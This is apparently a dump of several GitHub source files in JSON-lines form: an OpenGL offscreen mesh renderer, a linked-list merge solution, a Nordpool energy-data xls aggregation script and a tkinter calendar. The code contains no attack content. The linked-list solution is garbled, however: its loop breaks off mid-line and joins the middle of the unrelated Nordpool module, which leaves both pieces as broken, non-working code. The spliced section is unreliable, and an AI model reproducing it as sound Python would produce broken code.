print(loop_length_optimal(head=llist.head))\n","repo_name":"kamrul-pu/problem-solving","sub_path":"data_structure/linked_list/loop_length_in_sll.py","file_name":"loop_length_in_sll.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16223467227","text":"import ctypes\nimport numpy as np\nimport weakref\nimport os\n\n_USE_EGL_OFFSCREEN = False\nif 'MESHRENDER_EGL_OFFSCREEN' in os.environ:\n os.environ['PYOPENGL_PLATFORM'] = 'egl'\n _USE_EGL_OFFSCREEN = True\n\ntry:\n import OpenGL\n from OpenGL.GL import *\n from OpenGL.GL import shaders\n from OpenGL.arrays import *\nexcept Exception:\n import logging\n logging.warning('Cannot import OpenGL -- rendering will be broken!')\n\nfrom .constants import MAX_N_LIGHTS\nfrom .light import AmbientLight, PointLight, DirectionalLight\nfrom .shaders import vertex_shader, fragment_shader, depth_vertex_shader, depth_fragment_shader\nfrom .scene_object import InstancedSceneObject\n\n# Create static c_void_p objects to avoid leaking memory\nC_VOID_PS = []\nfor i in range(5):\n C_VOID_PS.append(ctypes.c_void_p(4*4*i))\n\nclass OpenGLRenderer(object):\n \"\"\"An OpenGL 3.0+ renderer, based on PyOpenGL.\n \"\"\"\n\n def __init__(self, scene):\n \"\"\"Initialize a renderer for a given scene.\n\n Parameters\n ----------\n scene : Scene\n A scene description.\n \"\"\"\n self.scene = scene\n self._width = self.scene.camera.intrinsics.width\n self._height = self.scene.camera.intrinsics.height\n self._vaids = None\n self._colorbuf, self._depthbuf = None, None\n self._framebuf = None\n\n # Initialize 
the OpenGL context\n self._init_gl_context()\n\n # Bind the frame buffer for offscreen rendering\n self._bind_frame_buffer()\n\n # Use the depth test functionality of OpenGL. Don't clip -- many normals may be backwards.\n glEnable(GL_DEPTH_TEST)\n glDepthMask(GL_TRUE)\n glDepthFunc(GL_LESS)\n glDepthRange(0.0, 1.0)\n\n # Load the meshes into VAO's\n self._buffers = None\n self._vaids = self._load_meshes()\n\n # Load the shaders\n # Fix for pyopengl -- bind a framebuffer\n glBindVertexArray(self._vaids[0])\n self._full_shader = self._load_shaders(vertex_shader, fragment_shader)\n self._depth_shader = self._load_shaders(depth_vertex_shader, depth_fragment_shader)\n glBindVertexArray(0)\n\n\n def _init_gl_context(self):\n if _USE_EGL_OFFSCREEN:\n self._init_egl()\n else:\n self._init_pyglet()\n\n\n def _make_gl_context_current(self):\n if not _USE_EGL_OFFSCREEN:\n if self._window:\n self._window.switch_to()\n\n\n def _init_pyglet(self):\n import pyglet\n pyglet.options['shadow_window'] = False\n\n self._window = None\n conf = pyglet.gl.Config(\n depth_size=24,\n double_buffer=True,\n major_version=3,\n minor_version=2\n )\n try:\n self._window = pyglet.window.Window(config=conf, visible=False,\n resizable=False, width=1, height=1)\n except Exception as e:\n raise ValueError('Failed to initialize Pyglet window with an OpenGL >= 3+ context. ' \\\n 'If you\\'re logged in via SSH, ensure that you\\'re running your script ' \\\n 'with vglrun (i.e. VirtualGL). Otherwise, the internal error message was: ' \\\n '\"{}\"'.format(e.message))\n\n def _init_egl(self):\n from OpenGL.EGL import EGL_SURFACE_TYPE, EGL_PBUFFER_BIT, EGL_BLUE_SIZE, \\\n EGL_RED_SIZE, EGL_GREEN_SIZE, EGL_DEPTH_SIZE, \\\n EGL_COLOR_BUFFER_TYPE, EGL_RGB_BUFFER, EGL_HEIGHT, \\\n EGL_RENDERABLE_TYPE, EGL_OPENGL_BIT, EGL_CONFORMANT, \\\n EGL_OPENGL_BIT, EGL_CONFIG_CAVEAT, EGL_NONE, \\\n EGL_DEFAULT_DISPLAY, EGL_NO_CONTEXT, EGL_WIDTH, \\\n EGL_OPENGL_API, \\\n eglGetDisplay, eglInitialize, eglChooseConfig, \\\n eglBindAPI, eglCreatePbufferSurface, \\\n eglCreateContext, eglMakeCurrent, EGLConfig\n\n self._egl_display = None\n self._egl_surface = None\n self._egl_context = None\n\n config_attributes = arrays.GLintArray.asArray([\n EGL_SURFACE_TYPE, EGL_PBUFFER_BIT,\n EGL_BLUE_SIZE, 8,\n EGL_RED_SIZE, 8,\n EGL_GREEN_SIZE, 8,\n EGL_DEPTH_SIZE, 24,\n EGL_COLOR_BUFFER_TYPE, EGL_RGB_BUFFER,\n EGL_RENDERABLE_TYPE, EGL_OPENGL_BIT,\n EGL_CONFORMANT, EGL_OPENGL_BIT,\n EGL_NONE\n ])\n major, minor = ctypes.c_long(), ctypes.c_long()\n num_configs = ctypes.c_long()\n configs = (EGLConfig*1)()\n\n # Cache DISPLAY if necessary and get an off-screen EGL display\n orig_dpy = None\n if 'DISPLAY' in os.environ:\n orig_dpy = os.environ['DISPLAY']\n del os.environ['DISPLAY']\n self._egl_display = eglGetDisplay(EGL_DEFAULT_DISPLAY)\n if orig_dpy is not None:\n os.environ['DISPLAY'] = orig_dpy\n\n # Initialize EGL\n eglInitialize(self._egl_display, major, minor)\n eglChooseConfig(self._egl_display, config_attributes, configs, 1, num_configs)\n\n # Bind EGL to the OpenGL API\n eglBindAPI(EGL_OPENGL_API)\n\n # Create an EGL pbuffer\n self._egl_surface = eglCreatePbufferSurface(self._egl_display, configs[0],\n [EGL_WIDTH, self._width, EGL_HEIGHT, self._height, EGL_NONE])\n\n # Create an EGL context\n self._egl_context = eglCreateContext(self._egl_display, configs[0], EGL_NO_CONTEXT, None)\n\n # Make the EGL context current\n eglMakeCurrent(self._egl_display, self._egl_surface, self._egl_surface, self._egl_context)\n\n @property\n def scene(self):\n return 
self._scene()\n\n @scene.setter\n def scene(self, s):\n self._scene = weakref.ref(s)\n\n def render(self, render_color=True, front_and_back=False):\n \"\"\"Render raw images of the scene.\n\n Parameters\n ----------\n render_color : bool\n If True, both a color and a depth image are returned.\n If False, only a depth image is returned.\n\n front_and_back : bool\n If True, all normals are treated as facing the camera.\n\n Returns\n -------\n tuple of (h, w, 3) uint8, (h, w) float32\n A raw RGB color image with pixel values in [0, 255] and a depth image\n with true depths expressed as floats. If render_color was False,\n only the depth image is returned.\n\n Note\n -----\n This function can be called repeatedly, regardless of changes to the scene\n (i.e. moving SceneObjects, adding and removing lights, moving the camera).\n However, adding or removing objects causes a new OpenGL context to be created,\n so put all the objects in the scene before calling it.\n\n Note\n ----\n Values listed as 0.0 in the depth image are actually at infinity\n (i.e. no object present at that pixel).\n \"\"\"\n self._make_gl_context_current()\n\n # Reload the frame buffers if the width or height of the camera changed\n width = self.scene.camera.intrinsics.width\n height = self.scene.camera.intrinsics.height\n if width != self._width or height != self._height:\n self._width = width\n self._height = height\n self._bind_frame_buffer()\n\n if render_color:\n return self._color_and_depth(front_and_back)\n else:\n return self._depth()\n\n def close(self):\n \"\"\"Destroy the OpenGL context attached to this renderer.\n\n Warning\n -------\n Once this has been called, the OpenGLRenderer object should be discarded.\n \"\"\"\n # Delete shaders\n if self._full_shader:\n glDeleteProgram(self._full_shader)\n self._full_shader = None\n if self._depth_shader:\n glDeleteProgram(self._depth_shader)\n self._depth_shader = None\n\n # Delete all mesh geometry\n if self._buffers:\n glDeleteBuffers(len(self._buffers), self._buffers)\n self._buffers = None\n\n # Delete framebuffers and renderbuffers\n if self._colorbuf and self._depthbuf:\n glDeleteRenderbuffers(2, [self._colorbuf, self._depthbuf])\n self._colorbuf = None\n self._depthbuf = None\n\n if self._framebuf:\n glDeleteFramebuffers(1, [self._framebuf])\n self._framebuf = None\n\n OpenGL.contextdata.cleanupContext()\n if _USE_EGL_OFFSCREEN:\n from OpenGL.EGL import eglDestroySurface, eglDestroyContext, eglTerminate\n if self._egl_display is not None:\n if self._egl_context is not None:\n eglDestroyContext(self._egl_display, self._egl_context)\n self._egl_context = None\n if self._egl_surface:\n eglDestroySurface(self._egl_display, self._egl_surface)\n self._egl_surface = None\n eglTerminate(self._egl_display)\n self._egl_display = None\n else:\n if self._window is not None:\n try:\n self._window.context.destroy()\n self._window.close()\n except:\n pass\n self._window = None\n\n def _bind_frame_buffer(self):\n \"\"\"Bind the frame buffer for offscreen rendering.\n \"\"\"\n # Release the color and depth buffers if they exist:\n if self._framebuf is not None:\n glDeleteRenderbuffers(2, [self._colorbuf, self._depthbuf])\n glDeleteFramebuffers(1, [self._framebuf])\n\n # Initialize the Framebuffer into which we will perform off-screen rendering\n self._colorbuf, self._depthbuf = glGenRenderbuffers(2)\n glBindRenderbuffer(GL_RENDERBUFFER, self._colorbuf)\n glRenderbufferStorage(GL_RENDERBUFFER, GL_RGBA, self._width, self._height)\n glBindRenderbuffer(GL_RENDERBUFFER, 
self._depthbuf)\n glRenderbufferStorage(GL_RENDERBUFFER, GL_DEPTH_COMPONENT24, self._width, self._height)\n\n self._framebuf = glGenFramebuffers(1)\n glBindFramebuffer(GL_DRAW_FRAMEBUFFER, self._framebuf)\n glFramebufferRenderbuffer(GL_DRAW_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, GL_RENDERBUFFER, self._colorbuf)\n glFramebufferRenderbuffer(GL_DRAW_FRAMEBUFFER, GL_DEPTH_ATTACHMENT, GL_RENDERBUFFER, self._depthbuf)\n\n def _load_shaders(self, vertex_shader, fragment_shader):\n \"\"\"Load and compile shaders from strings.\n \"\"\"\n shader = shaders.compileProgram(\n shaders.compileShader(vertex_shader, GL_VERTEX_SHADER),\n shaders.compileShader(fragment_shader, GL_FRAGMENT_SHADER)\n )\n\n return shader\n\n def _load_meshes(self):\n \"\"\"Load the scene's meshes into vertex buffers.\n \"\"\"\n VA_ids = glGenVertexArrays(len(self.scene.objects))\n self._buffers = []\n\n if len(self.scene.objects) == 1:\n VA_ids = [VA_ids]\n\n null = C_VOID_PS[0]\n for VA_id, obj in zip(VA_ids, self.scene.objects.values()):\n mesh = obj.mesh\n material = obj.material\n\n glBindVertexArray(VA_id)\n\n if material.smooth:\n # If smooth is True, we use indexed element arrays and set only one normal per vertex.\n\n # Set up the vertex VBO\n vertexbuffer = glGenBuffers(1)\n glBindBuffer(GL_ARRAY_BUFFER, vertexbuffer)\n glEnableVertexAttribArray(0)\n glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 0, null)\n glBufferData(GL_ARRAY_BUFFER,\n 4*3*len(mesh.vertices),\n np.array(mesh.vertices.flatten(), dtype=np.float32),\n GL_STATIC_DRAW)\n\n # Set up the normal VBO\n normalbuffer = glGenBuffers(1)\n glBindBuffer(GL_ARRAY_BUFFER, normalbuffer)\n glEnableVertexAttribArray(1)\n glVertexAttribPointer(1, 3, GL_FLOAT, GL_FALSE, 0, null)\n glBufferData(GL_ARRAY_BUFFER,\n 4*3*len(mesh.vertex_normals),\n np.array(mesh.vertex_normals.flatten(), dtype=np.float32),\n GL_STATIC_DRAW)\n\n # Set up the element index buffer\n elementbuffer = glGenBuffers(1)\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, elementbuffer)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER,\n 4*3*len(mesh.faces),\n np.array(mesh.faces.flatten(), dtype=np.int32),\n GL_STATIC_DRAW)\n self._buffers.extend([vertexbuffer, elementbuffer, normalbuffer])\n else:\n # If smooth is False, we treat each triangle independently\n # and set vertex normals to corresponding face normals.\n\n # Set up the vertices\n vertexbuffer = glGenBuffers(1)\n glBindBuffer(GL_ARRAY_BUFFER, vertexbuffer)\n glEnableVertexAttribArray(0)\n glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 0, null)\n glBufferData(GL_ARRAY_BUFFER,\n 4*3*3*len(mesh.triangles),\n np.array(mesh.triangles.flatten(), dtype=np.float32),\n GL_STATIC_DRAW)\n\n # Set up the normals\n normalbuffer = glGenBuffers(1)\n glBindBuffer(GL_ARRAY_BUFFER, normalbuffer)\n glEnableVertexAttribArray(1)\n glVertexAttribPointer(1, 3, GL_FLOAT, GL_FALSE, 0, null)\n normals = np.repeat(mesh.face_normals, 3, axis=0).astype(np.float32)\n normals = normals.flatten()\n glBufferData(GL_ARRAY_BUFFER,\n 4*len(normals),\n normals,\n GL_STATIC_DRAW)\n\n self._buffers.extend([vertexbuffer, normalbuffer])\n\n glVertexAttribDivisor(0, 0)\n glVertexAttribDivisor(1, 0)\n\n # Set up model matrix buffer\n modelbuf = glGenBuffers(1)\n self._buffers.extend([modelbuf])\n glBindBuffer(GL_ARRAY_BUFFER, modelbuf)\n for i in range(4):\n glEnableVertexAttribArray(2 + i)\n glVertexAttribPointer(2 + i, 4, GL_FLOAT, GL_FALSE, 4*16, C_VOID_PS[i])\n glVertexAttribDivisor(2 + i, 1)\n\n if isinstance(obj, InstancedSceneObject):\n glBufferData(GL_ARRAY_BUFFER, 4*16*len(obj.poses), None, 
GL_STATIC_DRAW)\n data = obj.raw_pose_data.flatten().astype(np.float32)\n glBufferSubData(GL_ARRAY_BUFFER, 0, 4*16*len(obj.poses), data)\n else:\n glBufferData(GL_ARRAY_BUFFER, 4*16, None, GL_STATIC_DRAW)\n glBufferSubData(GL_ARRAY_BUFFER, 0, 4*16, np.eye(4).flatten().astype(np.float32))\n\n # Set up color buffer\n colorbuf = glGenBuffers(1)\n self._buffers.extend([colorbuf])\n glBindBuffer(GL_ARRAY_BUFFER, colorbuf)\n glEnableVertexAttribArray(6)\n glVertexAttribPointer(6, 3, GL_FLOAT, GL_FALSE, 0, C_VOID_PS[0])\n glVertexAttribDivisor(6, 1)\n\n if isinstance(obj, InstancedSceneObject):\n glBufferData(GL_ARRAY_BUFFER, 4*3*len(obj.colors), None, GL_STATIC_DRAW)\n data = obj.colors.flatten().astype(np.float32)\n glBufferSubData(GL_ARRAY_BUFFER, 0, 4*3*len(obj.colors), data)\n else:\n glBufferData(GL_ARRAY_BUFFER, 4*3, None, GL_STATIC_DRAW)\n glBufferSubData(GL_ARRAY_BUFFER, 0, 4*3, obj.material.color.astype(np.float32))\n\n # Unbind all buffers\n glBindVertexArray(0)\n glBindBuffer(GL_ARRAY_BUFFER, 0)\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0)\n\n return VA_ids\n\n def _depth(self):\n \"\"\"Render a depth image of the scene.\n \"\"\"\n camera = self.scene.camera\n width = camera.intrinsics.width\n height = camera.intrinsics.height\n\n glBindFramebuffer(GL_DRAW_FRAMEBUFFER, self._framebuf)\n glViewport(0, 0, width, height)\n\n glClearColor(0.0, 0.0, 0.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n glUseProgram(self._depth_shader)\n\n # Get Uniform Locations from Shader\n v_id = glGetUniformLocation(self._depth_shader, 'V')\n p_id = glGetUniformLocation(self._depth_shader, 'P')\n m_id = glGetUniformLocation(self._depth_shader, 'M')\n\n glUniformMatrix4fv(v_id, 1, GL_TRUE, camera.V)\n glUniformMatrix4fv(p_id, 1, GL_TRUE, camera.P)\n\n for vaid, obj in zip(self._vaids, self.scene.objects.values()):\n if not obj.enabled:\n continue\n material = obj.material\n mesh = obj.mesh\n\n glUniformMatrix4fv(m_id, 1, GL_TRUE, obj.T_obj_world.matrix)\n\n glBindVertexArray(vaid)\n\n n_instances = 1\n if isinstance(obj, InstancedSceneObject):\n n_instances = obj.n_instances\n\n if material.smooth:\n glDrawElementsInstanced(GL_TRIANGLES, 3*len(mesh.faces), GL_UNSIGNED_INT, C_VOID_PS[0], n_instances)\n else:\n glDrawArraysInstanced(GL_TRIANGLES, 0, 3*len(mesh.faces), n_instances)\n\n glBindVertexArray(0)\n\n glUseProgram(0)\n\n glFlush()\n\n # Extract the z buffer\n glBindFramebuffer(GL_READ_FRAMEBUFFER, self._framebuf)\n depth_buf = (GLfloat * (width * height))(0)\n glReadPixels(0, 0, width, height, GL_DEPTH_COMPONENT, GL_FLOAT, depth_buf)\n\n # Re-format it into a numpy array\n depth_im = np.frombuffer(depth_buf, dtype=np.float32).reshape((height, width))\n depth_im = np.flip(depth_im, axis=0)\n inf_inds = (depth_im == 1.0)\n depth_im = 2.0 * depth_im - 1.0\n z_near, z_far = camera.z_near, camera.z_far\n depth_im = 2.0 * z_near * z_far / (z_far + z_near - depth_im * (z_far - z_near))\n depth_im[inf_inds] = 0.0\n\n return depth_im\n\n def _color_and_depth(self, front_and_back):\n \"\"\"Render a color image and a depth image of the scene.\n \"\"\"\n scene = self.scene\n camera = scene.camera\n width = camera.intrinsics.width\n height = camera.intrinsics.height\n\n glBindFramebuffer(GL_DRAW_FRAMEBUFFER, self._framebuf)\n glViewport(0, 0, width, height)\n\n glClearColor(.93, .93, 1, 1)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n glUseProgram(self._full_shader)\n\n # Get Uniform Locations from Shader\n p_id = glGetUniformLocation(self._full_shader, 'P')\n v_id = 
glGetUniformLocation(self._full_shader, 'V')\n m_id = glGetUniformLocation(self._full_shader, 'M')\n matprop_id = glGetUniformLocation(self._full_shader, 'material_properties')\n ambient_id = glGetUniformLocation(self._full_shader, 'ambient_light_info')\n directional_id = glGetUniformLocation(self._full_shader, \"directional_light_info\")\n n_directional_id = glGetUniformLocation(self._full_shader, \"n_directional_lights\")\n point_id = glGetUniformLocation(self._full_shader, \"point_light_info\")\n n_point_id = glGetUniformLocation(self._full_shader, \"n_point_lights\")\n front_and_back_id = glGetUniformLocation(self._full_shader, \"front_and_back\")\n\n # Bind bad normals id\n glUniform1i(front_and_back_id, int(front_and_back))\n\n # Bind view matrix\n glUniformMatrix4fv(v_id, 1, GL_TRUE, scene.camera.V)\n glUniformMatrix4fv(p_id, 1, GL_TRUE, scene.camera.P)\n\n # Bind ambient lighting\n glUniform4fv(ambient_id, 1, np.hstack((scene.ambient_light.color,\n scene.ambient_light.strength)))\n\n # Bind directional lighting\n glUniform1i(n_directional_id, len(scene.directional_lights))\n directional_info = np.zeros((2*MAX_N_LIGHTS, 4))\n for i, dlight in enumerate(scene.directional_lights):\n directional_info[2*i,:] = np.hstack((dlight.color, dlight.strength))\n directional_info[2*i+1,:] = np.hstack((dlight.direction, 0))\n glUniform4fv(directional_id, 2*MAX_N_LIGHTS, directional_info.flatten())\n\n # Bind point lighting\n glUniform1i(n_point_id, len(scene.point_lights))\n point_info = np.zeros((2*MAX_N_LIGHTS, 4))\n for i, plight in enumerate(scene.point_lights):\n point_info[2*i,:] = np.hstack((plight.color, plight.strength))\n point_info[2*i+1,:] = np.hstack((plight.location, 1))\n glUniform4fv(point_id, 2*MAX_N_LIGHTS, point_info.flatten())\n\n for vaid, obj in zip(self._vaids, scene.objects.values()):\n if not obj.enabled:\n continue\n\n mesh = obj.mesh\n material = obj.material\n\n glBindVertexArray(vaid)\n\n glUniformMatrix4fv(m_id, 1, GL_TRUE, obj.T_obj_world.matrix)\n glUniform4fv(matprop_id, 1, np.array([material.k_a, material.k_d, material.k_s, material.alpha]))\n\n if material.wireframe:\n glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)\n else:\n glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)\n\n n_instances = 1\n if isinstance(obj, InstancedSceneObject):\n n_instances = obj.n_instances\n\n if material.smooth:\n glDrawElementsInstanced(GL_TRIANGLES, 3*len(mesh.faces), GL_UNSIGNED_INT, C_VOID_PS[0], n_instances)\n else:\n glDrawArraysInstanced(GL_TRIANGLES, 0, 3*len(mesh.faces), n_instances)\n\n glBindVertexArray(0)\n\n glUseProgram(0)\n\n glFlush()\n\n # Extract the color and depth buffers\n glBindFramebuffer(GL_READ_FRAMEBUFFER, self._framebuf)\n color_buf = glReadPixels(0, 0, width, height, GL_RGB, GL_UNSIGNED_BYTE)\n depth_buf = glReadPixels(0, 0, width, height, GL_DEPTH_COMPONENT, GL_FLOAT)\n\n # Re-format them into numpy arrays\n color_im = np.frombuffer(color_buf, dtype=np.uint8).reshape((height, width, 3))\n color_im = np.flip(color_im, axis=0)\n\n depth_im = np.frombuffer(depth_buf, dtype=np.float32).reshape((height, width))\n depth_im = np.flip(depth_im, axis=0)\n inf_inds = (depth_im == 1.0)\n depth_im = 2.0 * depth_im - 1.0\n z_near, z_far = camera.z_near, camera.z_far\n depth_im = 2.0 * z_near * z_far / (z_far + z_near - depth_im * (z_far - z_near))\n depth_im[inf_inds] = 0.0\n\n return color_im, depth_im\n\n def __del__(self):\n 
self.close()\n\n","repo_name":"BerkeleyAutomation/meshrender","sub_path":"meshrender/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":23126,"program_lang":"python","lang":"en","doc_type":"code","stars":132,"dataset":"github-code","pt":"72"} +{"seq_id":"35492120239","text":"#21_Merge Two Sorted Lists\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n ls1, ls2=l1, l2\n ls=ListNode(None)\n head=ListNode(None)\n head.next=ls\n \n while ls1 and ls2:\n if ls1.val1:\n # As long as we have more than 1 xls, we \n # process it\n create_concat(join(root,folder),dest_path) \n else:\n pass\n elif folder == 'hydro_reservoir':\n handle_hydro(join(root,folder),dest_path) \n else:\n skipped.append(str(folder))\n # logger.info('Skipping folder ' + str(folder)) \n else:\n skipped.append(str(root.split('/')[-1]))\n # logger.info('Skipping folder ' + str(root.split('/')[-1]))\n \n if len(skipped):\n logger.info('We skipped the following folders: ' + str(skipped))\n else:\n logger.info('No folders were skipped')\n \n logger.info('Finished Nordpool yearly aggregation')\n logger.info('----------------------------------------------------------')\n\ndef join(path1, path2):\n '''\n We join two paths\n '''\n \n if path1[-1] == '/':\n return path1 + path2\n else:\n return path1 + '/' + path2\n \ndef handle_hydro(h_dir, dest_path): \n '''\n We handle hydro data:\n Hydro data is also in weird format and cannot be handled automatically \n and also has nly weekly data. I had to generate the csv files manually \n and then combine them. \n \n Inputs:\n - h_dir: Directory of our raw hydro data\n - dest_path: Directory where we want to store combined hydro-data\n '''\n \n #need to handle hydro data differently as it fails on automated aggregation\n #created csv files manually from hydro xls files\n hydro_df = []\n # h_dir = '/home/leon/Documents/think_outside/Omdena-think_outside_repo/NordPool_data/hydro_reservoir'\n for file in os.listdir(h_dir):\n # logger.info(str(file))\n if file[-3:] == 'csv':\n temp_df = pd.read_csv(join(h_dir,file),header=1)\n temp_df['week'] = temp_df['Unnamed: 0'].apply(lambda x: x.strip(' ').split('-')[0]) #get week and year\n temp_df['year'] = temp_df['Unnamed: 0'].apply(lambda x: x.strip(' ').split('-')[1])\n temp_df = temp_df[['week', 'year','NO', 'SE', 'FI']]\n hydro_df.append(temp_df)\n \n hydro_concat = pd.concat(hydro_df)\n hydro_concat = hydro_concat.sort_values(by = ['year', 'week'], ascending = [True, True]).reset_index(drop=True)\n hydro_concat.head()\n \n filename = 'concat_hydro_reservoir_weekly.csv'\n store_df_to_csv(hydro_concat, join(dest_path, filename), filename)\n hydro_concat.to_csv()\n\ndef read_file(input_file):\n '''\n Reads xls file into df\n '''\n\n temp_df = pd.read_html(input_file,decimal=',',thousands='') #returns list of dataframes\n temp_df = temp_df[0] #select df of interest\n x = 0\n for x in range(10):# we try to get the level values from the multi-index until an error is thrown, then we use x-1 to get the data\n try:\n temp_df.columns.get_level_values(x)\n except:\n break\n \n temp_df.columns = temp_df.columns.get_level_values(x-1)\n \n temp_df = temp_df.rename(columns={temp_df.columns[0]: \"date\"}) #name date column\n \n if ('Hours' in temp_df.columns.values) == True: #if hours include hours in datetime else just use date\n temp_df['datetime'] = temp_df['date'] + ' ' + 
temp_df['Hours'].apply(lambda x: x[0:2]) +':00'\n temp_df = temp_df.drop(columns=['date','Hours'])\n temp_df['datetime'] = pd.to_datetime(temp_df['datetime'].values,format='%d-%m-%Y %H:%M') #convert to datetime\n \n else: \n temp_df['datetime'] = temp_df['date'] \n temp_df = temp_df.drop(columns=['date'])\n temp_df['datetime'] = pd.to_datetime(temp_df['datetime'].values,format='%d-%m-%Y') #convert to datetime\n \n temp_df = temp_df.set_index('datetime')\n# temp_df = temp_df.sort_index(ascending=True) #sort from earliest to latest , handled during concat for efficiency\n \n return temp_df\n\n\ndef read_file_elbas_vol(input_file):\n '''\n We need a different function to read the elbas_volume_daily files \n as they are very inconsistent in both format and numberof columns.\n '''\n temp_df = pd.read_html(input_file,decimal=',',thousands='') #returns list of dataframes\n temp_df = temp_df[0] #select df of interest\n x = 0\n for x in range(10):# we try to get the level values from the multi-index until an error is thrown, then we use x-1 to get the data\n try:\n temp_cols = temp_df.columns.get_level_values(x)\n if temp_cols[1] == 'NO1': #we look through the multi-index until we get to the level with NO1 column names\n break\n else:\n pass\n except:\n break\n \n temp_df.columns = temp_df.columns.get_level_values(x)\n new_cols = temp_df.columns.values\n \n #we want to add back in the buy and sell information to the column names which was lost earlier\n \n for col in range(len(new_cols)):#loop through column names\n if new_cols[col] == 'datetime': #ignore datetime columns\n pass\n if col % 2 == 0:\n new_cols[col] = str(temp_df.columns.values[col]) + '_sell'\n else:\n new_cols[col] = str(temp_df.columns.values[col]) + '_buy'\n \n\n temp_df = temp_df.rename(columns={temp_df.columns[0]: \"date\"}) #name date column\n \n #update column names\n for col in range(len(new_cols)): \n if col == 0:\n pass\n else:\n temp_df = temp_df.rename(columns={temp_df.columns[col]: new_cols[col]})\n \n\n if ('Hours' in temp_df.columns.values) == True: #if hours include hours in datetime else just use date\n temp_df['datetime'] = temp_df['date'] + ' ' + temp_df['Hours'].apply(lambda x: x[0:2]) +':00'\n temp_df = temp_df.drop(columns=['date','Hours'])\n temp_df['datetime'] = pd.to_datetime(temp_df['datetime'].values,format='%d-%m-%Y %H:%M')\n \n else: \n temp_df['datetime'] = temp_df['date'] \n temp_df = temp_df.drop(columns=['date'])\n temp_df['datetime'] = pd.to_datetime(temp_df['datetime'].values,format='%d-%m-%Y')\n \n \n temp_df = temp_df.set_index('datetime')\n temp_df = temp_df.sort_index(ascending=True) #sort from earliest to latest , handled during concat for efficiency\n \n return temp_df\n\n\ndef concat_files_folder(folder):\n '''\n Will concat all xls files in a folder into pandas dataframe\n '''\n files = os.listdir(folder) #get list of files in folder\n df_list = []\n files_list = []\n for file_number in range(len(files)): #loop through files\n if files[file_number][-3:] == 'xls': #only read xls files\n files_list.append(str(files[file_number]))\n # logger.info('Reading ' + str(files[file_number]))\n #use different function for elbas volume daily\n if folder.split('/')[-1] == 'elbas_volume_daily': #check if folder is troublesome folder\n try: \n # logger.info('alternate function selected')\n df = read_file_elbas_vol(join(folder,files[file_number]))\n except:\n # logger.info('reverting to normal function')\n df = read_file(join(folder,files[file_number]))\n else:\n df = 
read_file(join(folder,files[file_number])) #read file from path\n # logger.info(str(files[file_number]) + ' read ok')\n df_list.append(df)\n else:\n pass\n \n if len(files_list) > 0:\n logger.info('Merged the following files together: ' + str(files_list))\n try:\n concat_df = pd.concat(df_list)\n except:\n logger.warning('Could not run concat of our dataframes. Should this' +\n ' folder consider read_file_elbas_vol ' +\n 'function instead?')\n concat_df = pd.concat(df_list)\n \n concat_df = concat_df.sort_index(ascending=True)\n \n return concat_df\n\n\ndef create_concat(input_folder,dest_path):\n '''\n Runs through files, makes a pandas df and then saves it as csv into the same \n folder\n '''\n \n # Look at working directory and get current folder\n current_folder = input_folder.split('/')[-1] \n \n concat_df = concat_files_folder(input_folder) #concat all xls files within folder\n newfilename = 'concat_' + current_folder + '.csv'#generate new filename\n csv_path = join(dest_path,newfilename)\n store_df_to_csv(concat_df, csv_path, newfilename)\n\n return concat_df\n\ndef store_df_to_csv(df, csv_path, filename):\n '''\n We store our df to a csv\n '''\n if os.path.isfile(csv_path):\n logger.info(str(filename) + ' created successfully by ' + \n 'over-writing previous existing one')\n else:\n logger.info(str(filename) + ' created successfully by creating' +\n ' new file (file did not exist previously)')\n \n df.to_csv(csv_path) #save as csv in specific folder\n \n","repo_name":"LHamnett/Data_Science_and_Machine_Learning_projects","sub_path":"Preprocessing/Energy_price_data_preprocessing/nordpool_merging.py","file_name":"nordpool_merging.py","file_ext":"py","file_size_in_byte":10657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8607184151","text":"import calendar\nimport datetime\nimport logging\nfrom tkinter import *\n\n\nclass MyCalendar:\n\n def __init__(self, title=\"Календарь\", icopath='../resources/calendar.ico', holidaypath='../holi.txt'):\n \"\"\"\n Class MyCalendar implements a calendar with a user-friendly interface\n :param title: title of the application\n :param icopath: path to the icon of the application\n :param holidaypath: path to the file with holidays, or where to create it\n \"\"\"\n f = open(holidaypath, 'a')\n f.close()\n\n self.root = Tk()\n self.root.title(title)\n self.root.resizable(False, False)\n self.days = []\n self.holidays = []\n\n self.now = datetime.datetime.now()\n self.year = self.now.year\n self.month = self.now.month\n\n self.back_button = Button(self.root, text=\"<\", command=self._back)\n self.back_button.grid(row=0, column=0, sticky=NSEW)\n self.next_button = Button(self.root, text=\">\", command=self._next)\n self.next_button.grid(row=0, column=6, sticky=NSEW)\n\n self.add_hol_area = Text(self.root, width=10, height=1, bg='white',\n font=(\"Arial 16 bold\", 12), fg='black', wrap=CHAR)\n self.add_hol_area.grid(row=9, column=2, columnspan=3, sticky=NSEW)\n self.add_hol_btn = Button(self.root, text=\"Add holiday\", command=self._add_holi)\n self.add_hol_btn.grid(row=10, column=2, columnspan=3, sticky=NSEW)\n\n self.rem_hol_btn = Button(self.root, text=\"Remove holiday\", command=self._rem_holi)\n self.rem_hol_btn.grid(row=11, column=2, columnspan=3, sticky=NSEW)\n\n self.info_label = Label(self.root, text='0', width=1, height=1, font='Arial 16 bold', fg='blue')\n self.info_label.grid(row=0, column=1, columnspan=5, sticky=NSEW)\n\n try:\n self.root.iconbitmap(icopath)\n except:\n logging.error(\"Ico not found...\")\n\n 
